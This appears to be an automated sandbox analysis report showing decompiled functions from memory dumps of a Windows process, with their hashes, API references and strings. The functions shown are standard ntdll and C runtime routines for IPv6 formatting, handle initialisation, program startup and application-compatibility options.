Kernel-MUI-Language-SKU, xrefs: 009389FC
Kernel-MUI-Language-Disallowed, xrefs: 00938914
Kernel-MUI-Language-Allowed, xrefs: 00938827
WindowsExcludedProcs, xrefs: 009387C1
Kernel-MUI-Number-Allowed, xrefs: 009387E6

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 009513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E009513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x912926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x919cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00947707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00947707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00947707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00947707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x009513d5
0x009513d9
0x009513dc
0x009513de
0x009513e1
0x009513e8
0x009513ee
0x0097e8fd
0x00000000
0x0097e921
0x0097e921
0x0097e928
0x0097e982
0x0097e98a
0x00000000
0x0097e99a
0x0097e99e
0x0097e9a3
0x0097e9a8
0x0097e9b9
0x0097e978
0x00000000
0x0097e978
0x0097e98a
0x0097e92a
0x0097e931
0x0097e944
0x0097e944
0x0097e950
0x0097e954
0x0097e959
0x0097e95e
0x0097e963
0x0097e970
0x00000000
0x0097e975
0x0097e93b
0x0097e980
0x00000000
0x0097e980
0x0097e942
0x0097e94b
0x00000000
0x0097e94b
0x00000000
0x0097e942
0x009513f4
0x009513f4
0x009513f9
0x009513fc
0x009513ff
0x00951406
0x0097e9cc
0x0097e9d2
0x0097e9d2
0x0097e9cc
0x0095140c
0x00951411
0x00951431
0x0095143a
0x0095143c
0x0095143f
0x0095143f
0x00951442
0x00951447
0x009514a8
0x009514ac
0x0097e9e2
0x0097e9e7
0x0097e9ec
0x0097ea05
0x0097ea05
0x00000000
0x00951449
0x00000000
0x00951449
0x0095144c
0x00951459
0x00951462
0x00951469
0x0095146a
0x00951470
0x00951473
0x00951476
0x00951476
0x00951490
0x00951495
0x0095138e
0x00951390
0x00951397
0x00951398
0x00951399
0x009513a1
0x009513a4
0x009513a4
0x00951498
0x0095149c
0x0095149f
0x009514a2
0x00000000
0x00000000
0x009514a4
0x00000000
0x009514a4
0x00951413
0x00951415
0x00951416
0x00951419
0x0095141c
0x00951422
0x009513b7
0x009513bc
0x009513bf
0x009513bf
0x009513c2
0x00951424
0x00951424
0x00951424
0x00951427
0x0095142b
0x0095142c
0x0095142c
0x0095142c
0x00000000
0x0095141c
0x00951411

APIs

___swprintf_l.LIBCMT ref: 0095146B
___swprintf_l.LIBCMT ref: 00951490
___swprintf_l.LIBCMT ref: 0097E970

Strings

ffff:, xrefs: 0097E94B
:%u.%u.%u.%u, xrefs: 0097E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 0097E9B0
::%hs%u.%u.%u.%u, xrefs: 0097E967

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012BA5E2, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012BA5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t160;

				_push(0x64);
				_push(0x12cd8c0);
				E012B9160(__ebx, __edi, __esi);
				E012BBE5F(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				_t160 =  *0x12d2f60 - _t130; // 0x0
				if(_t160 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E012BC55B();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0x12d2f60 = _t81;
						 *0x12d2f5c = _t141;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x12d2f60; // 0x0
						}
						GetStartupInfoW(_t155 - 0x74);
						__eflags =  *((short*)(_t155 - 0x42));
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t147 = (_t130 << 6) +  *0x12d2f60;
								 *(_t155 - 0x24) = _t147;
								__eflags =  *_t147 - 0xffffffff;
								if( *_t147 == 0xffffffff) {
									L35:
									_t147[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									__eflags = _t142 - 0xffffffff;
									if(_t142 == 0xffffffff) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x12d3064;
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t142;
										if(_t142 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t142);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -19738452
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t147[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t147 - 0xfffffffe;
								if( *_t147 == 0xfffffffe) {
									goto L35;
								}
								_t147[1] = _t147[1] | 0x00000080;
								goto L49;
							}
							 *(_t155 - 4) = 0xfffffffe;
							E012BA8A6();
							L2:
							_t86 = 1;
							L3:
							return E012B91A5(_t86);
						}
						_t105 =  *(_t155 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t155 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t155 - 0x1c) = 0x800;
						}
						_t149 = 1;
						__eflags = 1;
						 *(_t155 - 0x30) = 1;
						while(1) {
							__eflags =  *0x12d2f5c - _t135; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t138 = E012BC55B(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0x12d2f60[_t149] = _t138;
								 *0x12d2f5c =  *0x12d2f5c + _t141;
								__eflags =  *0x12d2f5c;
								while(1) {
									__eflags = _t138 - 0x12d2f60[_t149] + 0x800;
									if(_t138 >= 0x12d2f60[_t149] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *(_t155 - 0x1c);
								continue;
							}
							_t135 =  *0x12d2f5c; // 0x0
							 *(_t155 - 0x1c) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(1) {
							__eflags = _t143 - _t135;
							if(_t143 >= _t135) {
								goto L31;
							}
							_t150 =  *_t139;
							__eflags = _t150 - 0xffffffff;
							if(_t150 == 0xffffffff) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							}
							__eflags = _t150 - 0xfffffffe;
							if(_t150 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t154 = ((_t143 & 0x0000001f) << 6) + 0x12d2f60[_t143 >> 5];
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
								_t38 = _t154 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t154 + 8;
								 *_t39 =  *(_t154 + 8) + 1;
								__eflags =  *_t39;
								_t139 =  *(_t155 - 0x20);
								L25:
								_t135 =  *(_t155 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E012B96F0(_t155, 0x12d1380, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E012B96F0(_t155, 0x12d1380, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

APIs

__lock.LIBCMT ref: 012BA5F0

Part of subcall function 012BBE5F: __mtinitlocknum.LIBCMT ref: 012BBE71
Part of subcall function 012BBE5F: EnterCriticalSection.KERNEL32(?,?,012BD668,0000000D,?,?,?,?,012CDA28,00000008,012BD601,00000000,00000000,012B8F04,012C1E56,00000000), ref: 012BBE8A

@_EH4_CallFilterFunc@8.LIBCMT ref: 012BA60E
__calloc_crt.LIBCMT ref: 012BA627
@_EH4_CallFilterFunc@8.LIBCMT ref: 012BA642
GetStartupInfoW.KERNEL32(?,012CD8C0,00000064), ref: 012BA697
__calloc_crt.LIBCMT ref: 012BA6E2
GetFileType.KERNEL32 ref: 012BA729
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 012BA762
GetStdHandle.KERNEL32(-000000F6), ref: 012BA81B
GetFileType.KERNEL32 ref: 012BA82D
InitializeCriticalSectionAndSpinCount.KERNEL32(-012D2F54,00000FA0), ref: 012BA862

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
String ID:
API String ID: 1456538442-0
Opcode ID: f05663cb3c9d792ced724edf9c14fca6ccf7b6ce8aac59d38b86b14c914de088
Instruction ID: 3af1030ae1833064506bd5f2d8e32aa930fa85645348002c6f7c4af2593e6920
Opcode Fuzzy Hash: f05663cb3c9d792ced724edf9c14fca6ccf7b6ce8aac59d38b86b14c914de088
Instruction Fuzzy Hash: E791F1B1D25346CFDB24CF68D8845EDBBB0EF06364B24826ED6A6AB2C1D7349403CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B88A7, Relevance: 16.6, APIs: 11, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 91%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				void* _t24;
				void* _t25;
				void* _t26;
				signed int _t38;
				void* _t40;
				void* _t46;
				signed int _t49;
				void* _t51;
				void* _t53;
				void* _t60;

				_t60 = __fp0;
				_t47 = __edi;
				_t46 = __edx;
				E012BFC48();
				_push(0x14);
				_push(0x12cd838);
				E012B9160(__ebx, __edi, __esi);
				_t49 = E012BC013() & 0x0000ffff;
				E012BFBFB(2);
				_t53 =  *0x12b0000 - 0x5a4d; // 0x5a4d
				if(_t53 == 0) {
					_t17 =  *0x12b003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t17 + 0x12b0000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x12b0000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x12b0018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x12b0018)) != 0x10b) {
							goto L2;
						} else {
							_t38 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x12b0074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x12b0074)) > 0xe) {
								__eflags =  *(_t17 + 0x12b00e8);
								_t6 =  *(_t17 + 0x12b00e8) != 0;
								__eflags = _t6;
								_t38 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t38 = 0;
				}
				 *(_t51 - 0x1c) = _t38;
				if(E012BD058() == 0) {
					E012B89F5(0x1c);
				}
				if(E012BD6D2(_t38, _t47) == 0) {
					_t19 = E012B89F5(0x10);
				}
				E012BBE1F(_t19);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				E012BA5C3();
				 *0x12d4080 = GetCommandLineA();
				 *0x12d2284 = E012BFCE2();
				_t24 = E012BF8ED();
				_t56 = _t24;
				if(_t24 < 0) {
					E012B751F(_t38, _t46, _t47, _t49, _t56, 8);
				}
				_t25 = E012BFB1A(_t38, _t46, _t47, _t49);
				_t57 = _t25;
				if(_t25 < 0) {
					E012B751F(_t38, _t46, _t47, _t49, _t57, 9);
				}
				_t26 = E012B7559(_t47, _t49, 1);
				_pop(_t40);
				_t58 = _t26;
				if(_t26 != 0) {
					E012B751F(_t38, _t46, _t47, _t49, _t58, _t26);
					_pop(_t40);
				}
				_t50 = E012B1040(_t40, _t47, _t49, _t58, _t60, 0x12b0000, 0, E012BFD6D(), _t49);
				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
				if(_t38 == 0) {
					E012B77B1(_t50);
				}
				E012B754A();
				 *(_t51 - 4) = 0xfffffffe;
				return E012B91A5(_t50);
			}

0x012b88a7
0x012b88a7
0x012b88a7
0x012b88a7
0x012b88b1
0x012b88b3
0x012b88b8
0x012b88c2
0x012b88c7
0x012b88d2
0x012b88d9
0x012b88df
0x012b88e4
0x012b88ee
0x00000000
0x012b88f0
0x012b88f5
0x012b88fc
0x00000000
0x012b88fe
0x012b88fe
0x012b8900
0x012b8907
0x012b8909
0x012b890f
0x012b890f
0x012b890f
0x012b890f
0x012b8907
0x012b88fc
0x012b88db
0x012b88db
0x012b88db
0x012b88db
0x012b8912
0x012b891c
0x012b8920
0x012b8925
0x012b892d
0x012b8931
0x012b8936
0x012b8937
0x012b893c
0x012b8940
0x012b894b
0x012b8955
0x012b895a
0x012b895f
0x012b8961
0x012b8965
0x012b896a
0x012b896b
0x012b8970
0x012b8972
0x012b8976
0x012b897b
0x012b897e
0x012b8983
0x012b8984
0x012b8986
0x012b8989
0x012b898e
0x012b898e
0x012b89a2
0x012b89a4
0x012b89a9
0x012b89ac
0x012b89ac
0x012b89b1
0x012b89e6
0x012b89f4

APIs

___security_init_cookie.LIBCMT ref: 012B88A7

Part of subcall function 012BC013: GetStartupInfoW.KERNEL32(?), ref: 012BC01D

_fast_error_exit.LIBCMT ref: 012B8920
_fast_error_exit.LIBCMT ref: 012B8931
__RTC_Initialize.LIBCMT ref: 012B8937
__ioinit0.LIBCMT ref: 012B8940
GetCommandLineA.KERNEL32(012CD838,00000014), ref: 012B8945
___crtGetEnvironmentStringsA.LIBCMT ref: 012B8950
__setargv.LIBCMT ref: 012B895A
__setenvp.LIBCMT ref: 012B896B
__cinit.LIBCMT ref: 012B897E
__wincmdln.LIBCMT ref: 012B898F

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
String ID:
API String ID: 1504447550-0
Opcode ID: a9651625be412c0432d1d054dc67cfcd45ad546c26b1e36cb6c51f88cb446eb0
Instruction ID: 8f0b1312b1d43878eb4b03472a2c5b72e539268eeaea1b83e7570194c2e6379a
Opcode Fuzzy Hash: a9651625be412c0432d1d054dc67cfcd45ad546c26b1e36cb6c51f88cb446eb0
Instruction Fuzzy Hash: 1C21C730A347479AEF217BB4A9C8BFA21685F607C5F104429EB0C9A1C1EFB489849356

Uniqueness

Uniqueness Score: -1.00%

Function 00947EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00947EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9f2088; // 0x775b4c11
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00947F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00963F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0091DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00963F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00920D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00963F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00928375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00963F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0098E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00963F92();
					_t38 = 1;
					L2:
					return E0091E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00947f08
0x00947f0f
0x00947f12
0x00947f1b
0x00947f31
0x00963ead
0x00963eb4
0x00000000
0x00000000
0x00963eba
0x00963ecd
0x00963ed2
0x00963ee1
0x00963ee7
0x00963eec
0x00963f12
0x00963f18
0x00963f1a
0x00000000
0x00000000
0x00963f20
0x00963f26
0x00963f28
0x00000000
0x00000000
0x00963f2e
0x00963f30
0x00000000
0x00000000
0x00963f3a
0x00963f3b
0x00963f53
0x00963f64
0x00963f69
0x00963f6c
0x00963f6d
0x00963f6f
0x0096e304
0x0096e30f
0x0096e315
0x0096e31e
0x0096e321
0x0096e327
0x0096e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0096e32f
0x0096e32f
0x0096e337
0x0096e33a
0x0096e33b
0x0096e33d
0x0096e33f
0x0096e341
0x0096e341
0x0096e34e
0x0096e353
0x0096e358
0x0096e35d
0x0096e35f
0x00000000
0x00000000
0x0096e365
0x0096e365
0x0096e368
0x0096e36e
0x00000000
0x00000000
0x0096e374
0x0096e32f
0x00963f75
0x00963f7a
0x00963f7c
0x00963f7e
0x00963f86
0x00947f39
0x00947f47
0x00947f47
0x00947f37
0x00947f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00963F12

Strings

ExecuteOptions, xrefs: 00963F04
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0096E2FB
CLIENT(ntdll): Processing section info %ws..., xrefs: 0096E345
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00963F4A
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00963EC4
Execute=1, xrefs: 00963F5E
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00963F75

Memory Dump Source

